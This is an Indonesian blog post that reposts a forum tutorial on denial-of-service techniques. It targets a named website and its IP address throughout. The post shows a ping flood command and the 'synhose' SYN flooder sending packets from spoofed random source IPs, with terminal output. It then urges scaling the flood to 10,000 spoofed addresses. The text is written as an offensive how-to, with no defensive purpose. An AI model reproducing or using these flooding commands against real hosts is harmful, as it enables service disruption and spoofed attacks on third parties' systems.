Skip to content

emka.web.id

Menu
  • Home
  • Indeks Artikel
  • Tutorial
  • Tentang Kami
Menu

Aneka Tool & Teknik Untuk DOS / DDOS

Posted on May 29, 2010 by Syauqi Wiryahasana
Mencoba menyambung artikel terdahulu tentang tool DDOS web-based dari Ardiantz.com, saya sadurkan lagi bagaimana mrwisdom secara apik menulis tentang tool dan trik yang biasa digunakan dalam melakukan DDOS di Jasakom. 1. ICMP ATTACK Ok selanjutnya kita bisa juga melakukan pengujian apakah box tersebut bisa kita serang dengan icmp packets: [code lang="bash"] bt ~ # ping sec-r1z.com PING sec-r1z.com (74.63.241.86) 56(84) bytes of data. 64 bytes from 86-241-63-74.SECURED-BY-SEC4SERVER.COM (74.63.241.86): icm=10 ttl=128 time=273 ms [2]+ Stopped ping sec-r1z.com bt ~ # [/code] Ok kita bisa melihat ketika kita ping sec-r1z.com dan ipnya diresolve ke 74.63.241.86 dan juga direply langsung olehnya : reply 64 bytes dari 74.63.241.86 yang menandakan kita bisa menambahkan efek serangan icmp ke target kita. Contoh Teknik dasar untuk melakukan ping flood dari root shell unix atau linux kita, ketikkan ini (misal target host adalah sec-r1z.com): [code lang="bash"] ping sec-r1z.com -fs 50000 PING sec-r1z.com (74.63.241.86) 50000(50028) bytes of data. ....................................................... [3]+ Stopped ping sec-r1z.com -fs 50000 [/code] 2. SYN Attack syn attack merupakan salah satu metode penyerangan favorit attacker jaman dulu yang memanfaatkan kelemahan three way andsake. Salah satu tool yang biasa saya pakai untuk syn attack adalah synhose, Di mana synhose ini akan melakukan spoof random ip untuk mengirimkan paket ke target kita, sehingga seolah olah di target kita menerima banyak serangan dari ip yang berbeda. SEcara default jika tidak diset di argumen maka synhose akan menyerang port 80, bisa kita liat di sourcenya: [code lang="bash"] if(port == 0) port = 80; [/code] Misal kita akan menyerang sec-r1z.com di port terbuka 80 dari 10 spoof ip berbeda berikut ini contohnya: [code lang="bash"] bt ~ # ./synhose sec-r1z.com 80 10 SynHose [A random source IP syn flooder] Written by knight / Idea by : rza Destination : sec-r1z.com Port : 80 NumberOfTimes: 10 SynHosing sec-r1z.com at port 80 from 108.248.253.31 port 2884 SynHosing sec-r1z.com at port 80 from 248.36.16.139 port 4 SynHosing sec-r1z.com at port 80 from 68.48.179.170 port 409 SynHosing sec-r1z.com at port 80 from 5.54.172.218 port 9780 SynHosing sec-r1z.com at port 80 from 156.228.227.167 port 5327 SynHosing sec-r1z.com at port 80 from 108.99.240.141 port 1746 SynHosing sec-r1z.com at port 80 from 242.249.38.240 port 924 SynHosing sec-r1z.com at port 80 from 111.233.60.127 port 4544 SynHosing sec-r1z.com at port 80 from 60.194.164.239 port 4234 SynHosing sec-r1z.com at port 80 from 174.243.162.91 port 8044 bt ~ # [/code] dari result di atas komputer kita mengirimkan paket syn ke sec-r1z.com dengan port tujuan 80 dari berbagai ip, misal yang terakhir dari spoof ip 174.243.162.91 melalui port 8044. Hanya dari 10 ip tentu kurang sedap bukan?? mari kita serang dari 10000 ip berbeda: [code] bt ~ # ./synhose sec-r1z.com 80 10000 [/code]
Seedbacklink

Recent Posts

TENTANG EMKA.WEB>ID

EMKA.WEB.ID adalah blog seputar teknologi informasi, edukasi dan ke-NU-an yang hadir sejak tahun 2011. Kontak: kontak@emka.web.id.

©2024 emka.web.id Proudly powered by wpStatically